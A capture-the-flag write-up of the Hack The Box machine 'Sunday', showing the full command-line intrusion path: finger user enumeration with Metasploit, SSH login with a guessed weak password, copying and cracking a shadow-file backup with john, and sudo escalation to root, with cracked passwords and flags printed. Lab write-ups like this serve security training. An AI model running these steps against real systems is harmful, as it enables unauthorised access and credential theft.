Eui Chul Chung

Vulnerability Researcher
PEN: OSCP, OSEP, OSCE3
WEB: OSWA, OSWE
EXP: OSED


Categories:

Tags:
Area of Interest:
Categories:
Vulnerabilities:



About

Sunday is a fairly simple machine, however it uses fairly old software and can be a bit unpredictable at times. It mainly focuses on exploiting the Finger service as well as the use of weak credentials.

Enumeration

Running the script portscan.sh reveals 4 attack vectors, Finger, RPC, HTTPS and SSH.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sudo portscan.sh 10.129.125.78

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ cat PortScan\(10.129.125.78\)

PORT      STATE SERVICE  VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
|   GenericLines:
|     No one logged on
|   GetRequest:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help:
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest:
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie:
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind  2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
| tls-alpn:
|_  http/1.1
| http-title: Solaris Dashboard
|_Requested resource was https://10.129.125.78:6787/solaris/
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after:  2031-12-06T19:40:00
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
22022/tcp open  ssh      OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)

Exploitation

Finger

First, using the auxiliary/scanner/finger/finger_users module from Metasploit, I’m able to find 2 users sammy and sunny.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ msfconsole -q -x 'use auxiliary/scanner/finger/finger_users; set RHOSTS 10.129.125.78; set RPORT 79; set USERS_FILE /usr/share/wordlists/seclists/Usernames/Names/names.txt; run; exit'
[*] Starting persistent handler(s)...
RHOSTS => 10.129.125.78
RPORT => 79
USERS_FILE => /usr/share/wordlists/seclists/Usernames/Names/names.txt
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: noaccess
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: nobody4
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: nobody
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: lp
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: adm
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: dladm
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: netcfg
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: dhcpserv
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: ikeuser
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: netadm
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: bin
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: smmsp
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: root
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: sammy
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: sunny
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: sys
[+] 10.129.125.78:79      - 10.129.125.78:79 Users found: adm, bin, dhcpserv, dladm, ikeuser, lp, netadm, netcfg, noaccess, nobody, nobody4, root, sammy, smmsp, sunny, sys
[*] 10.129.125.78:79      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SSH

After a few educated guesses, I’m able to use the credential sunny:sunday to gain a shell as the user sunny.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sshpass -p sunday ssh sunny@10.129.125.78 -p 22022
Last login: Fri Oct 13 04:23:37 2023
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
sunny@sunday:~$ id
uid=101(sunny) gid=10(staff)

Lateral Movement

With a bit of enumeration, I’m able to find some entries in .bash_history. According to the log, the user sunny ran a command cat /backup/shadow.backup which implies that a backup of the file /etc/shadow exists and is accessible.

sunny@sunday:~$ cat .bash_history
su -
su -
cat /etc/resolv.conf
su -
ps auxwww|grep overwrite
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
sudo /root/troll
sudo /root/troll
su -
sudo -l
sudo /root/troll
ps auxwww
ps auxwww
ps auxwww
top
top
top
ps auxwww|grep overwrite
su -
su -
cat /etc/resolv.conf
ps auxwww|grep over
sudo -l
sudo /root/troll
sudo /root/troll
sudo /root/troll
sudo /root/troll

By checking the contents of /backup/shadow.backup, I’m able to confirm that the file is a partial backup of /etc/shadow that contains hashed passwords for sammy and sunny.

sunny@sunday:~$ cat /backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

After exfiltrating the file to the C2 server, I’m able to use john to crack the password cooldude! for the user sammy.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sshpass -p sunday scp -P 22022 sunny@10.129.125.78:/backup/shadow.backup .

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ john shadow.backup --users=sammy --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

With the credentials found, I’m able to gain a shell as the user sammy.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sshpass -p 'cooldude!' ssh sammy@10.129.125.78 -p 22022
Last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
-bash-4.4$ id
uid=100(sammy) gid=10(staff)

Privilege Escalation

Checking for sudo rights for the user sammy shows that I’m able to run any commands as any users with a password.

-bash-4.4$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

By switching to the super user with the given privilege, I’m able to gain a shell as the user root.

-bash-4.4$ sudo su
Password:

root@sunday:/home/sammy# id
uid=0(root) gid=0(root)

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

root@sunday:/home/sammy# cat /home/sammy/user.txt
2ce980a3404d0997b734a876f88ea946

root@sunday:/home/sammy# cat /root/root.txt
5e163c81c7d61be51bc246723c755591